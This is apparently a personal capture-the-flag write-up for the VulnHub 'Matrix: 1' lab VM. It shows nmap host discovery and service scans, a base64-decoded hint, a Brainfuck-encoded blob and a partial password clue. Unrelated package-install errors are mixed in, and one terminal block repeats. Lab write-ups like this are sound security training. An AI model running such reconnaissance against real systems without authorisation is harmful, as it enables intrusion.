MATRIX: 1 2021-11-25

MATRIX: 1


MATRIX: 1

About Release

Back to the Top

Name: Matrix: 1

Date release: 19 Aug 2018

Author: Ajay Verma

Series: Matrix

Download

Back to the Top

Please remember that VulnHub is a free community resource so we are unable to check the machines that are provided to us. Before you download, please read our FAQs sections dealing with the dangers of running unknown VMs and our suggestions for “protecting yourself and your network. If you understand the risks, please download!

Machine_Matrix.zip (Size: 552 MB)

Download: https://mega.nz/#!CiwBjRZB!EtKOQvDQjytMq3LkkMgrHDC9EYxEz8mqpOg5M2N1OOk

Download (Mirror): https://download.vulnhub.com/matrix/Machine_Matrix.zip

Download (Torrent): https://download.vulnhub.com/matrix/Machine_Matrix.zip.torrent  ( Magnet)

┌──(rootkwkl)-[/home/kwkl/下载]└─# ll                              总用量 107916-rw-r--r-- 1 kwkl kwkl      972 11月  1 13:59 api-rw-r--r-- 1 kwkl kwkl 46501062 10月 14 01:04 Nessus-8.15.2-debian6_amd64.deb-rw-r--r-- 1 kwkl kwkl 31958540 11月 23 23:35 python3-pyqt5-dbg_5.15.2+dfsg-3_amd64.deb-rw-r--r-- 1 kwkl kwkl 32038036 11月 23 23:34 python3-pyqt5-dbg_5.15.2+dfsg-3_arm64.deb                                                                                                                          ┌──(rootkwkl)-[/home/kwkl/下载]└─# dpkg -i ython3-pyqt5-dbg_5.15.2+dfsg-3_amd64.deb

dpkg: 错误: 无法访问归档 'ython3-pyqt5-dbg_5.15.2+dfsg-3_amd64.deb': 没有那个文件或目录                                                                                                                          ┌──(rootkwkl)-[/home/kwkl/下载]└─# dpkg -i python3-pyqt5-dbg_5.15.2+dfsg-3_amd64.deb                                                                    2 ⨯

正在选中未选择的软件包 python3-pyqt5-dbg。(正在读取数据库 ... 系统当前共安装有 270587 个文件和目录。)准备解压 python3-pyqt5-dbg_5.15.2+dfsg-3_amd64.deb  ...正在解压 python3-pyqt5-dbg (5.15.2+dfsg-3) ...dpkg: 依赖关系问题使得 python3-pyqt5-dbg 的配置工作不能继续: python3-pyqt5-dbg 依赖于 python3-dbg;然而:  未安装软件包 python3-dbg。 python3-pyqt5-dbg 依赖于 python3-pyqt5 (= 5.15.2+dfsg-3);然而:  未安装软件包 python3-pyqt5。 python3-pyqt5-dbg 依赖于 python3-pyqt5.sip-dbg (>= 12.8);然而:  未安装软件包 python3-pyqt5.sip-dbg。

dpkg: 处理软件包 python3-pyqt5-dbg (--install)时出错: 依赖关系问题 - 仍未被配置在处理时有错误发生: python3-pyqt5-dbg                                                                                                                          ┌──(rootkwkl)-[/home/kwkl/下载]└─# apt install  python3-dbg python3-pyqt5.sip-dbg python3-pyqt5                                                        1 ⨯正在读取软件包列表... 完成正在分析软件包的依赖关系树... 完成正在读取状态信息... 完成              没有可用的软件包 python3-pyqt5.sip-dbg,但是它被其它的软件包引用了。这可能意味着这个缺失的软件包可能已被废弃,或者只能在其他发布源中找到

E: 软件包 python3-pyqt5.sip-dbg 没有可安装候选                                                                                                                          ┌──(rootkwkl)-[/home/kwkl/下载]└─# apt install  python3-dbg python3-pyqt5.sip-dbg python3-pyqt5                                                      100 ⨯正在读取软件包列表... 完成正在分析软件包的依赖关系树... 完成正在读取状态信息... 完成              没有可用的软件包 python3-pyqt5.sip-dbg,但是它被其它的软件包引用了。这可能意味着这个缺失的软件包可能已被废弃,或者只能在其他发布源中找到

E: 软件包 python3-pyqt5.sip-dbg 没有可安装候选                                                                                                                          ┌──(rootkwkl)-[/home/kwkl/下载]└─# nmap -n 172.16.70.0/24                                                                                            100 ⨯Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-23 23:37 HKTNmap scan report for 172.16.70.1Host is up (0.00026s latency).Not shown: 998 closed portsPORT      STATE SERVICE49158/tcp open  unknown49161/tcp open  unknownMAC Address: 00:50:56:C0:00:05 (VMware)

Nmap scan report for 172.16.70.2Host is up (0.000097s latency).All 1000 scanned ports on 172.16.70.2 are closedMAC Address: 00:50:56:EE:4E:08 (VMware)

Nmap scan report for 172.16.70.139Host is up (0.00074s latency).Not shown: 997 closed portsPORT      STATE SERVICE22/tcp    open  ssh80/tcp    open  http31337/tcp open  EliteMAC Address: 00:0C:29:0D:35:13 (VMware)

Nmap scan report for 172.16.70.254Host is up (0.00022s latency).All 1000 scanned ports on 172.16.70.254 are filteredMAC Address: 00:50:56:E2:9B:C8 (VMware)

Nmap scan report for 172.16.70.122Host is up (0.0000030s latency).Not shown: 999 closed portsPORT    STATE SERVICE3000/tcp open  ppp

Nmap done: 256 IP addresses (5 hosts up) scanned in 24.66 seconds                                                                                                                          ┌──(rootkwkl)-[/home/kwkl/下载]└─#  nmap -A -v -sS -sV -p-Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-23 23:38 HKTNSE: Loaded 153 scripts for scanning.NSE: Script Pre-scanning.Initiating NSE at 23:38Completed NSE at 23:38, 0.00s elapsedInitiating NSE at 23:38Completed NSE at 23:38, 0.00s elapsedInitiating NSE at 23:38Completed NSE at 23:38, 0.00s elapsedNSE: Script Post-scanning.Initiating NSE at 23:38Completed NSE at 23:38, 0.00s elapsedInitiating NSE at 23:38Completed NSE at 23:38, 0.00s elapsedInitiating NSE at 23:38Completed NSE at 23:38, 0.00s elapsedRead data files from: /usr/bin/../share/nmapWARNING: No targets were specified, so 0 hosts scanned.Nmap done: 0 IP addresses (0 hosts up) scanned in 0.63 seconds          Raw packets sent: 0 (0B) | Rcvd: 0 (0B)                                                                                                                          ┌──(rootkwkl)-[/home/kwkl/下载]└─#  nmap -A -v -sS -sV -p- 172.16.70.139Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-23 23:38 HKTNSE: Loaded 153 scripts for scanning.NSE: Script Pre-scanning.Initiating NSE at 23:38Completed NSE at 23:38, 0.00s elapsedInitiating NSE at 23:38Completed NSE at 23:38, 0.00s elapsedInitiating NSE at 23:38Completed NSE at 23:38, 0.00s elapsedInitiating ARP Ping Scan at 23:38Scanning 172.16.70.139 [1 port]Completed ARP Ping Scan at 23:38, 0.08s elapsed (1 total hosts)Initiating Parallel DNS resolution of 1 host. at 23:38Completed Parallel DNS resolution of 1 host. at 23:38, 0.05s elapsedInitiating SYN Stealth Scan at 23:38Scanning 172.16.70.139 [65535 ports]Discovered open port 22/tcp on 172.16.70.139Discovered open port 80/tcp on 172.16.70.139Discovered open port 31337/tcp on 172.16.70.139Completed SYN Stealth Scan at 23:38, 2.14s elapsed (65535 total ports)Initiating Service scan at 23:38Scanning 3 services on 172.16.70.139Completed Service scan at 23:38, 6.02s elapsed (3 services on 1 host)Initiating OS detection (try #1) against 172.16.70.139NSE: Script scanning 172.16.70.139.Initiating NSE at 23:38Completed NSE at 23:39, 1.41s elapsedInitiating NSE at 23:39Completed NSE at 23:39, 0.01s elapsedInitiating NSE at 23:39Completed NSE at 23:39, 0.00s elapsedNmap scan report for 172.16.70.139Host is up (0.00050s latency).Not shown: 65532 closed portsPORT      STATE SERVICE VERSION22/tcp    open  ssh    OpenSSH 7.7 (protocol 2.0)| ssh-hostkey: |  2048 9c:8b:c7:7b:48:db:db:0c:4b:68:69:80:7b:12:4e:49 (RSA)|  256 49:6c:23:38:fb:79:cb:e0:b3:fe:b2:f4:32:a2:70:8e (ECDSA)|_  256 53:27:6f:04:ed:d1:e7:81:fb:00:98:54:e6:00:84:4a (ED25519)80/tcp    open  http    SimpleHTTPServer 0.6 (Python 2.7.14)| http-methods: |_  Supported Methods: GET HEAD|http-server-header: SimpleHTTP/0.6 Python/2.7.14|http-title: Welcome in Matrix31337/tcp open  http    SimpleHTTPServer 0.6 (Python 2.7.14)| http-methods: |_  Supported Methods: GET HEAD|http-server-header: SimpleHTTP/0.6 Python/2.7.14|http-title: Welcome in MatrixMAC Address: 00:0C:29:0D:35:13 (VMware)Device type: general purposeRunning: Linux 3.X|4.XOS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4OS details: Linux 3.2 - 4.9Uptime guess: 17.103 days (since Sat Nov  6 21:11:21 2021)Network Distance: 1 hopTCP Sequence Prediction: Difficulty=261 (Good luck!)IP ID Sequence Generation: All zeros

TRACEROUTEHOP RTT    ADDRESS1  0.50 ms 172.16.70.139

NSE: Script Post-scanning.Initiating NSE at 23:39Completed NSE at 23:39, 0.00s elapsedInitiating NSE at 23:39Completed NSE at 23:39, 0.00s elapsedInitiating NSE at 23:39Completed NSE at 23:39, 0.00s elapsedRead data files from: /usr/bin/../share/nmapOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 11.76 seconds          Raw packets sent: 65558 (2.885MB) | Rcvd: 65550 (2.623MB)                                                                                                                          ┌──(rootkwkl)-[/home/kwkl/下载]└─#

┌──(rootkwkl)-[/home/kwkl/下载]└─# echo "ZWNobyAiVGhlbiB5b3UnbGwgc2VlLCB0aGF0IGl0IGlzIG5vdCB0aGUgc3Bvb24gdGhhdCBiZW5kcywgaXQgaXMgb25seSB5b3Vyc2VsZi4gIiA+IEN5cGhlci5tYXRyaXg=" | base64 -decho "Then you'll see, that it is not the spoon that bends, it is only yourself. " > Cypher.matrix                                                                                                                          ┌──(rootkwkl)-[/home/kwkl/下载]└─#

┌──(rootkwkl)-[/home/kwkl/下载]└─# ll                              总用量 107916-rw-r--r-- 1 kwkl kwkl      972 11月  1 13:59 api-rw-r--r-- 1 kwkl kwkl 46501062 10月 14 01:04 Nessus-8.15.2-debian6_amd64.deb-rw-r--r-- 1 kwkl kwkl 31958540 11月 23 23:35 python3-pyqt5-dbg_5.15.2+dfsg-3_amd64.deb-rw-r--r-- 1 kwkl kwkl 32038036 11月 23 23:34 python3-pyqt5-dbg_5.15.2+dfsg-3_arm64.deb                                                                                                                          ┌──(rootkwkl)-[/home/kwkl/下载]└─# dpkg -i ython3-pyqt5-dbg_5.15.2+dfsg-3_amd64.deb

dpkg: 错误: 无法访问归档 'ython3-pyqt5-dbg_5.15.2+dfsg-3_amd64.deb': 没有那个文件或目录                                                                                                                          ┌──(rootkwkl)-[/home/kwkl/下载]└─# dpkg -i python3-pyqt5-dbg_5.15.2+dfsg-3_amd64.deb                                                                    2 ⨯

正在选中未选择的软件包 python3-pyqt5-dbg。(正在读取数据库 ... 系统当前共安装有 270587 个文件和目录。)准备解压 python3-pyqt5-dbg_5.15.2+dfsg-3_amd64.deb  ...正在解压 python3-pyqt5-dbg (5.15.2+dfsg-3) ...dpkg: 依赖关系问题使得 python3-pyqt5-dbg 的配置工作不能继续: python3-pyqt5-dbg 依赖于 python3-dbg;然而:  未安装软件包 python3-dbg。 python3-pyqt5-dbg 依赖于 python3-pyqt5 (= 5.15.2+dfsg-3);然而:  未安装软件包 python3-pyqt5。 python3-pyqt5-dbg 依赖于 python3-pyqt5.sip-dbg (>= 12.8);然而:  未安装软件包 python3-pyqt5.sip-dbg。

dpkg: 处理软件包 python3-pyqt5-dbg (--install)时出错: 依赖关系问题 - 仍未被配置在处理时有错误发生: python3-pyqt5-dbg                                                                                                                          ┌──(rootkwkl)-[/home/kwkl/下载]└─# apt install  python3-dbg python3-pyqt5.sip-dbg python3-pyqt5                                                        1 ⨯正在读取软件包列表... 完成正在分析软件包的依赖关系树... 完成正在读取状态信息... 完成              没有可用的软件包 python3-pyqt5.sip-dbg,但是它被其它的软件包引用了。这可能意味着这个缺失的软件包可能已被废弃,或者只能在其他发布源中找到

E: 软件包 python3-pyqt5.sip-dbg 没有可安装候选                                                                                                                          ┌──(rootkwkl)-[/home/kwkl/下载]└─# apt install  python3-dbg python3-pyqt5.sip-dbg python3-pyqt5                                                      100 ⨯正在读取软件包列表... 完成正在分析软件包的依赖关系树... 完成正在读取状态信息... 完成              没有可用的软件包 python3-pyqt5.sip-dbg,但是它被其它的软件包引用了。这可能意味着这个缺失的软件包可能已被废弃,或者只能在其他发布源中找到

E: 软件包 python3-pyqt5.sip-dbg 没有可安装候选                                                                                                                          ┌──(rootkwkl)-[/home/kwkl/下载]└─# nmap -n 172.16.70.0/24                                                                                            100 ⨯Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-23 23:37 HKTNmap scan report for 172.16.70.1Host is up (0.00026s latency).Not shown: 998 closed portsPORT      STATE SERVICE49158/tcp open  unknown49161/tcp open  unknownMAC Address: 00:50:56:C0:00:05 (VMware)

Nmap scan report for 172.16.70.2Host is up (0.000097s latency).All 1000 scanned ports on 172.16.70.2 are closedMAC Address: 00:50:56:EE:4E:08 (VMware)

Nmap scan report for 172.16.70.139Host is up (0.00074s latency).Not shown: 997 closed portsPORT      STATE SERVICE22/tcp    open  ssh80/tcp    open  http31337/tcp open  EliteMAC Address: 00:0C:29:0D:35:13 (VMware)

Nmap scan report for 172.16.70.254Host is up (0.00022s latency).All 1000 scanned ports on 172.16.70.254 are filteredMAC Address: 00:50:56:E2:9B:C8 (VMware)

Nmap scan report for 172.16.70.122Host is up (0.0000030s latency).Not shown: 999 closed portsPORT    STATE SERVICE3000/tcp open  ppp

Nmap done: 256 IP addresses (5 hosts up) scanned in 24.66 seconds                                                                                                                          ┌──(rootkwkl)-[/home/kwkl/下载]└─#  nmap -A -v -sS -sV -p-Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-23 23:38 HKTNSE: Loaded 153 scripts for scanning.NSE: Script Pre-scanning.Initiating NSE at 23:38Completed NSE at 23:38, 0.00s elapsedInitiating NSE at 23:38Completed NSE at 23:38, 0.00s elapsedInitiating NSE at 23:38Completed NSE at 23:38, 0.00s elapsedNSE: Script Post-scanning.Initiating NSE at 23:38Completed NSE at 23:38, 0.00s elapsedInitiating NSE at 23:38Completed NSE at 23:38, 0.00s elapsedInitiating NSE at 23:38Completed NSE at 23:38, 0.00s elapsedRead data files from: /usr/bin/../share/nmapWARNING: No targets were specified, so 0 hosts scanned.Nmap done: 0 IP addresses (0 hosts up) scanned in 0.63 seconds          Raw packets sent: 0 (0B) | Rcvd: 0 (0B)                                                                                                                          ┌──(rootkwkl)-[/home/kwkl/下载]└─#  nmap -A -v -sS -sV -p- 172.16.70.139Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-23 23:38 HKTNSE: Loaded 153 scripts for scanning.NSE: Script Pre-scanning.Initiating NSE at 23:38Completed NSE at 23:38, 0.00s elapsedInitiating NSE at 23:38Completed NSE at 23:38, 0.00s elapsedInitiating NSE at 23:38Completed NSE at 23:38, 0.00s elapsedInitiating ARP Ping Scan at 23:38Scanning 172.16.70.139 [1 port]Completed ARP Ping Scan at 23:38, 0.08s elapsed (1 total hosts)Initiating Parallel DNS resolution of 1 host. at 23:38Completed Parallel DNS resolution of 1 host. at 23:38, 0.05s elapsedInitiating SYN Stealth Scan at 23:38Scanning 172.16.70.139 [65535 ports]Discovered open port 22/tcp on 172.16.70.139Discovered open port 80/tcp on 172.16.70.139Discovered open port 31337/tcp on 172.16.70.139Completed SYN Stealth Scan at 23:38, 2.14s elapsed (65535 total ports)Initiating Service scan at 23:38Scanning 3 services on 172.16.70.139Completed Service scan at 23:38, 6.02s elapsed (3 services on 1 host)Initiating OS detection (try #1) against 172.16.70.139NSE: Script scanning 172.16.70.139.Initiating NSE at 23:38Completed NSE at 23:39, 1.41s elapsedInitiating NSE at 23:39Completed NSE at 23:39, 0.01s elapsedInitiating NSE at 23:39Completed NSE at 23:39, 0.00s elapsedNmap scan report for 172.16.70.139Host is up (0.00050s latency).Not shown: 65532 closed portsPORT      STATE SERVICE VERSION22/tcp    open  ssh    OpenSSH 7.7 (protocol 2.0)| ssh-hostkey: |  2048 9c:8b:c7:7b:48:db:db:0c:4b:68:69:80:7b:12:4e:49 (RSA)|  256 49:6c:23:38:fb:79:cb:e0:b3:fe:b2:f4:32:a2:70:8e (ECDSA)|_  256 53:27:6f:04:ed:d1:e7:81:fb:00:98:54:e6:00:84:4a (ED25519)80/tcp    open  http    SimpleHTTPServer 0.6 (Python 2.7.14)| http-methods: |_  Supported Methods: GET HEAD|http-server-header: SimpleHTTP/0.6 Python/2.7.14|http-title: Welcome in Matrix31337/tcp open  http    SimpleHTTPServer 0.6 (Python 2.7.14)| http-methods: |_  Supported Methods: GET HEAD|http-server-header: SimpleHTTP/0.6 Python/2.7.14|http-title: Welcome in MatrixMAC Address: 00:0C:29:0D:35:13 (VMware)Device type: general purposeRunning: Linux 3.X|4.XOS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4OS details: Linux 3.2 - 4.9Uptime guess: 17.103 days (since Sat Nov  6 21:11:21 2021)Network Distance: 1 hopTCP Sequence Prediction: Difficulty=261 (Good luck!)IP ID Sequence Generation: All zeros

TRACEROUTEHOP RTT    ADDRESS1  0.50 ms 172.16.70.139

NSE: Script Post-scanning.Initiating NSE at 23:39Completed NSE at 23:39, 0.00s elapsedInitiating NSE at 23:39Completed NSE at 23:39, 0.00s elapsedInitiating NSE at 23:39Completed NSE at 23:39, 0.00s elapsedRead data files from: /usr/bin/../share/nmapOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 11.76 seconds          Raw packets sent: 65558 (2.885MB) | Rcvd: 65550 (2.623MB)                                                                                                                          ┌──(rootkwkl)-[/home/kwkl/下载]└─#

┌──(rootkwkl)-[/home/kwkl/下载]└─# echo "ZWNobyAiVGhlbiB5b3UnbGwgc2VlLCB0aGF0IGl0IGlzIG5vdCB0aGUgc3Bvb24gdGhhdCBiZW5kcywgaXQgaXMgb25seSB5b3Vyc2VsZi4gIiA+IEN5cGhlci5tYXRyaXg=" | base64 -decho "Then you'll see, that it is not the spoon that bends, it is only yourself. " > Cypher.matrix                                                                                                                          ┌──(rootkwkl)-[/home/kwkl/下载]└─#

┌──(rootkwkl)-[/home/kwkl/下载]└─# cat Cypher.matrix +++++ ++++[ ->+++ +++++ +<]>+ +++++ ++.<+ +++[- >++++ <]>++ ++++. ++++++.<++ +++++ ++[-> ----- ----< ]>--- -.<++ +++++ +[->+ +++++ ++<]> +++.--.<++ +[->+ ++<]> ++++. <++++ ++++[ ->--- ----- <]>-- ----- ----- --.<++++++ ++[-> +++++ +++<] >++++ +.+++ +++++ +.+++ +++.< +++[- >---< ]>------.< +++[- >+++< ]>+++ +.<++ +++++ ++[-> ----- ----< ]>-.< +++++ +++[-

++++ ++++< ]>+++ +++++ +.+++ ++.++ ++++. ----- .<+++ +++++ [->-- ------<]>- ----- ----- ----. <++++ ++++[ ->+++ +++++ <]>++ +++++ +++++ +.<+++[->- --<]> ---.< ++++[ ->+++ +<]>+ ++.-- .---- ----- .<+++ [->++ +<]>++++++ .<+++ +++++ +[->- ----- ---<] >---- ---.< +++++ +++[- >++++ ++++<]>+.< ++++[ ->+++ +<]>+ +.<++ +++++ ++[-> ----- ----< ]>--. <++++ ++++[->+++ +++++ <]>++ +++++ .<+++ [->++ +<]>+ ++++. <++++ [->-- --<]> .<+++[->++ +<]>+ ++++. +.<++ +++++ +[->- ----- --<]> ----- ---.< +++[- >---<]>--- .<+++ +++++ +[->+ +++++ +++<] >++++ ++.<+ ++[-> ---<] >---- -.<+++[->+ ++<]> ++.<+ ++[-> ---<] >---. <++++ ++++[ ->--- ----- <]>-- ------.<++ +++++ +[->+ +++++ ++<]> +++++ +++++ +++++ +.<++ +[->- --<]> ------.<++ ++[-> ++++< ]>++. .++++ .---- ----. +++.< +++[- >---< ]>--- --.<++++++ ++[-> ----- ---<] >---- .<+++ +++++ [->++ +++++ +<]>+ +++++ +++++.<+++ ++++[ ->--- ----< ]>--- ----- -.<++ +++++ [->++ +++++ <]>++ ++++++++.. <++++ +++[- >---- ---<] >---- ----- --.<+ +++++ ++[-> +++++ +++<]++.< +++++ [->-- ---<] >-..< +++++ +++[- >---- ----< ]>--- ----- ---.---.<+ +++++ ++[-> +++++ +++<] >++++ .<+++ ++[-> +++++ <]>++ +++++ +.+++++.<+ ++[-> ---<] >---- --.<+ +++++ [->-- ----< ]>--- ----. <++++ +[->-----< ]>-.< +++++ [->++ +++<] >++++ ++++. <++++ +[->+ ++++< ]>+++ ++++++.<++ ++[-> ++++< ]>+.+ .<+++ +[->- ---<] >---- .<+++ [->++ +<]>+ +..<+++[-> +++<] >++++ .<+++ +++++ [->-- ----- -<]>- ----- ----- --.<+ ++[->---<] >---. <++++ ++[-> +++++ +<]>+ ++++. <++++ ++[-> ----- -<]>- ----.<++++ ++++[ ->+++ +++++ <]>++ ++++. +++++ ++++. +++.< +++[- >---< ]>--.--.<+ ++[-> +++<] >++++ ++.<+ +++++ +++[- >---- ----- <]>-- -.<++ ++++++[->+ +++++ ++<]> +++++ +++++ ++.<+ ++[-> ---<] >--.< ++++[ ->+++ +<]>++.+.< +++++ ++++[ ->--- ----- -<]>- --.<+ +++++ +++[- >++++ +++++ <]>+++.+++ .---- ----. <++++ ++++[ ->--- ----- <]>-- ----- ----- ---.< ++++++++[- >++++ ++++< ]>+++ .++++ +.--- ----. <++++ [->++ ++<]> +.<++ ++[->----< ]>-.+ +.<++ ++[-> ++++< ]>+.< +++[- >---< ]>--- ---.< +++[- >+++<]>+++ +.+.< +++++ ++++[ ->--- ----- -<]>- -.<++ +++++ ++[-> +++++ ++++<]>++. ----. <++++ ++++[ ->--- ----- <]>-- ----- ----- ---.< +++++ +[->++++++ <]>++ +++.< +++++ +[->- ----- <]>-- ---.< +++++ +++[- >++++ ++++<]>+++ +++++ .---- ---.< ++++[ ->+++ +<]>+ ++++. <++++ [->-- --<]> -.<+++++++ +[->- ----- --<]> ----- .<+++ +++++ +[->+ +++++ +++<] >+.<+ ++[->---<] >---- .<+++ [->++ +<]>+ +.--- -.<++ +[->- --<]> --.++ .++.- .<++++++++ [->-- ----- -<]>- ---.< +++++ ++++[ ->+++ +++++ +<]>+ +++++ .<+++[->-- -<]>- ----. <+++[ ->+++ <]>++ .<+++ [->-- -<]>- --.<+ +++++ ++[->----- ---<] >---- ----. <++++ +++[- >++++ +++<] >++++ +++.. <++++ +++[----- ---<] >---- ---.< +++++ ++++[ ->+++ +++++ +<]>+ ++.-- .++++ +++.<+++++ ++++[ ->--- ----- -<]>- ----- --.<+ +++++ +++[- >++++ +++++ <]>+++++++ +.<++ +[->- --<]> -.+++ +++.- --.<+ +++++ +++[- >---- ----- <]>-.<++++ ++++[ ->+++ +++++ <]>++ +++++ +++++ .++++ +++++ .<+++ +[->- ---<]--.+ +++++ ++.<+ +++++ ++[-> ----- ---<] >---- ----- --.<+ +++++ ++[->+++++ +++<] >+.<+ ++[-> +++<] >++++ .<+++ [->-- -<]>- .<+++ +++++ [->------- -<]>- ---.< +++++ +++[- >++++ ++++< ]>+++ +++.+ ++.++ +++.< +++[----< ]>-.< +++++ +++[- >---- ----< ]>--- -.<++ +++++ +[->+ +++++ ++<]>+++.< +++[- >+++< ]>+++ .+++. .<+++ [->-- -<]>- ---.- -.<++ ++[-> ++++<]>+.< +++++ ++++[ ->--- ----- -<]>- --.<+ +++++ +++[- >++++ +++++ <]>++.+.-- .---- ----- .++++ +.--- ----. <++++ ++++[ ->--- ----- <]>-- -----.<+++ +++++ [->++ +++++ +<]>+ +++++ +++++ ++++. ----- ----. <++++ ++++[->--- ----- <]>-- ----. <++++ ++++[ ->+++ +++++ <]>++ +++++ +++++ ++++.<+++[ ->--- <]>-- ----. <++++ [->++ ++<]> ++..+ +++.- ----- --.++ +.<+++[->- --<]> ----- .<+++ ++++[ ->--- ----< ]>--- --.<+ ++++[ ->--- --<]>----- ---.- --.<

┌──(rootkwkl)-[/home/kwkl/下载]└─#

在线解码:http://ctf.ssleye.com/brain.html

+++++ ++++[ ->+++ +++++ +<]>+ +++++ ++.<+ +++[- >++++ <]>++ ++++. +++++

+.<++ +++++ ++[-> ----- ----< ]>--- -.<++ +++++ +[->+ +++++ ++<]> +++.-

-.<++ +[->+ ++<]> ++++. <++++ ++++[ ->--- ----- <]>-- ----- ----- --.<+

+++++ ++[-> +++++ +++<] >++++ +.+++ +++++ +.+++ +++.< +++[- >---< ]>---

---.< +++[- >+++< ]>+++ +.<++ +++++ ++[-> ----- ----< ]>-.< +++++ +++[-

>++++ ++++< ]>+++ +++++ +.+++ ++.++ ++++. ----- .<+++ +++++ [->-- -----

-<]>- ----- ----- ----. <++++ ++++[ ->+++ +++++ <]>++ +++++ +++++ +.<++

+[->- --<]> ---.< ++++[ ->+++ +<]>+ ++.-- .---- ----- .<+++ [->++ +<]>+

+++++ .<+++ +++++ +[->- ----- ---<] >---- ---.< +++++ +++[- >++++ ++++<

]>+.< ++++[ ->+++ +<]>+ +.<++ +++++ ++[-> ----- ----< ]>--. <++++ ++++[

->+++ +++++ <]>++ +++++ .<+++ [->++ +<]>+ ++++. <++++ [->-- --<]> .<+++

[->++ +<]>+ ++++. +.<++ +++++ +[->- ----- --<]> ----- ---.< +++[- >---<

]>--- .<+++ +++++ +[->+ +++++ +++<] >++++ ++.<+ ++[-> ---<] >---- -.<++

+[->+ ++<]> ++.<+ ++[-> ---<] >---. <++++ ++++[ ->--- ----- <]>-- -----

-.<++ +++++ +[->+ +++++ ++<]> +++++ +++++ +++++ +.<++ +[->- --<]> -----

-.<++ ++[-> ++++< ]>++. .++++ .---- ----. +++.< +++[- >---< ]>--- --.<+

+++++ ++[-> ----- ---<] >---- .<+++ +++++ [->++ +++++ +<]>+ +++++ +++++

.<+++ ++++[ ->--- ----< ]>--- ----- -.<++ +++++ [->++ +++++ <]>++ +++++

+++.. <++++ +++[- >---- ---<] >---- ----- --.<+ +++++ ++[-> +++++ +++<]

>++.< +++++ [->-- ---<] >-..< +++++ +++[- >---- ----< ]>--- ----- ---.-

--.<+ +++++ ++[-> +++++ +++<] >++++ .<+++ ++[-> +++++ <]>++ +++++ +.+++

++.<+ ++[-> ---<] >---- --.<+ +++++ [->-- ----< ]>--- ----. <++++ +[->-

----< ]>-.< +++++ [->++ +++<] >++++ ++++. <++++ +[->+ ++++< ]>+++ +++++

+.<++ ++[-> ++++< ]>+.+ .<+++ +[->- ---<] >---- .<+++ [->++ +<]>+ +..<+

++[-> +++<] >++++ .<+++ +++++ [->-- ----- -<]>- ----- ----- --.<+ ++[->

---<] >---. <++++ ++[-> +++++ +<]>+ ++++. <++++ ++[-> ----- -<]>- ----.

<++++ ++++[ ->+++ +++++ <]>++ ++++. +++++ ++++. +++.< +++[- >---< ]>--.

--.<+ ++[-> +++<] >++++ ++.<+ +++++ +++[- >---- ----- <]>-- -.<++ +++++

+[->+ +++++ ++<]> +++++ +++++ ++.<+ ++[-> ---<] >--.< ++++[ ->+++ +<]>+

+.+.< +++++ ++++[ ->--- ----- -<]>- --.<+ +++++ +++[- >++++ +++++ <]>++

+.+++ .---- ----. <++++ ++++[ ->--- ----- <]>-- ----- ----- ---.< +++++

+++[- >++++ ++++< ]>+++ .++++ +.--- ----. <++++ [->++ ++<]> +.<++ ++[->

----< ]>-.+ +.<++ ++[-> ++++< ]>+.< +++[- >---< ]>--- ---.< +++[- >+++<

]>+++ +.+.< +++++ ++++[ ->--- ----- -<]>- -.<++ +++++ ++[-> +++++ ++++<

]>++. ----. <++++ ++++[ ->--- ----- <]>-- ----- ----- ---.< +++++ +[->+

+++++ <]>++ +++.< +++++ +[->- ----- <]>-- ---.< +++++ +++[- >++++ ++++<

]>+++ +++++ .---- ---.< ++++[ ->+++ +<]>+ ++++. <++++ [->-- --<]> -.<++

+++++ +[->- ----- --<]> ----- .<+++ +++++ +[->+ +++++ +++<] >+.<+ ++[->

---<] >---- .<+++ [->++ +<]>+ +.--- -.<++ +[->- --<]> --.++ .++.- .<+++

+++++ [->-- ----- -<]>- ---.< +++++ ++++[ ->+++ +++++ +<]>+ +++++ .<+++

[->-- -<]>- ----. <+++[ ->+++ <]>++ .<+++ [->-- -<]>- --.<+ +++++ ++[->

----- ---<] >---- ----. <++++ +++[- >++++ +++<] >++++ +++.. <++++ +++[-

>---- ---<] >---- ---.< +++++ ++++[ ->+++ +++++ +<]>+ ++.-- .++++ +++.<

+++++ ++++[ ->--- ----- -<]>- ----- --.<+ +++++ +++[- >++++ +++++ <]>++

+++++ +.<++ +[->- --<]> -.+++ +++.- --.<+ +++++ +++[- >---- ----- <]>-.

<++++ ++++[ ->+++ +++++ <]>++ +++++ +++++ .++++ +++++ .<+++ +[->- ---<]

>--.+ +++++ ++.<+ +++++ ++[-> ----- ---<] >---- ----- --.<+ +++++ ++[->

+++++ +++<] >+.<+ ++[-> +++<] >++++ .<+++ [->-- -<]>- .<+++ +++++ [->--

----- -<]>- ---.< +++++ +++[- >++++ ++++< ]>+++ +++.+ ++.++ +++.< +++[-

>---< ]>-.< +++++ +++[- >---- ----< ]>--- -.<++ +++++ +[->+ +++++ ++<]>

+++.< +++[- >+++< ]>+++ .+++. .<+++ [->-- -<]>- ---.- -.<++ ++[-> ++++<

]>+.< +++++ ++++[ ->--- ----- -<]>- --.<+ +++++ +++[- >++++ +++++ <]>++

.+.-- .---- ----- .++++ +.--- ----. <++++ ++++[ ->--- ----- <]>-- -----

.<+++ +++++ [->++ +++++ +<]>+ +++++ +++++ ++++. ----- ----. <++++ ++++[

->--- ----- <]>-- ----. <++++ ++++[ ->+++ +++++ <]>++ +++++ +++++ ++++.

<+++[ ->--- <]>-- ----. <++++ [->++ ++<]> ++..+ +++.- ----- --.++ +.<++

+[->- --<]> ----- .<+++ ++++[ ->--- ----< ]>--- --.<+ ++++[ ->--- --<]>

----- ---.- --.<


字符集

加 密

解 密

You can enter into matrix as guest, with password k1ll0rXX

Note: Actually, I forget last two characters so I have replaced with XX try your luck and find correct string of password.

